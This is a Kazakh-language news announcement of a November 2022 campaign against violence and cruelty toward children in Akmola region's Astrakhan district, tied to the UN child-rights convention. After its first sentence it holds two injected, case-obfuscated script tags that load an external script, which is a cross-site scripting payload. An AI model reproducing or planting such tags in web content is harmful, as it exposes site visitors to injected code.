Қазақстанда БҰҰ-ның Бала құқықтары туралы конвенциясын ратификациялау аясында 8-20 қараша аралығында Ақмола облысы Астрахан ауданында «Қатыгездік пен зорлық-зомбылықсыз балалық шақ» республикалық ақпараттық науқаны өтеді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.11.2022

Қазақстанда БҰҰ-ның Бала құқықтары туралы конвенциясын ратификациялау аясында 8-20 қараша аралығында Ақмола облысы Астрахан ауданында «Қатыгездік пен зорлық-зомбылықсыз балалық шақ» республикалық ақпараттық науқаны өтеді. Науқанның мақсаты-ересектер мен балаларды қоса алғанда, қоғамның балаларға қатысты зорлық-зомбылық пен қатыгездік проблемасы, оның бала мен қоғам үшін салдары, сондай-ақ осы саладағы халықаралық заңнаманың негіздері туралы хабардар болуын арттыру. Акция аясында республика өңірлерінде баспасөз конференциялары, онлайн-семинарлар, ҮЕҰ өкілдерімен сараптамалық кездесулер, мектептердегі сынып сағаттары, рейдтік іс-шаралар және т. б. өткізіледі. Республикалық және жергілікті телеарналарда бейнесюжеттер көрсету жоспарлануда, зорлық-зомбылық және қатыгез қарым-қатынас мәселелері бойынша парақшалар, буклеттер, плакаттар таратылады. Бұл науқанға ата-аналар, балалар, жастар, мүдделі мемлекеттік құрылымдардың өкілдері, зорлық-зомбылық пен зорлық-зомбылықтың құрбаны болған балалар мен жасөспірімдер қатысады. 

 

Просмотров: 243


Пікір қосу



Деректерді қолтаңбаға қосу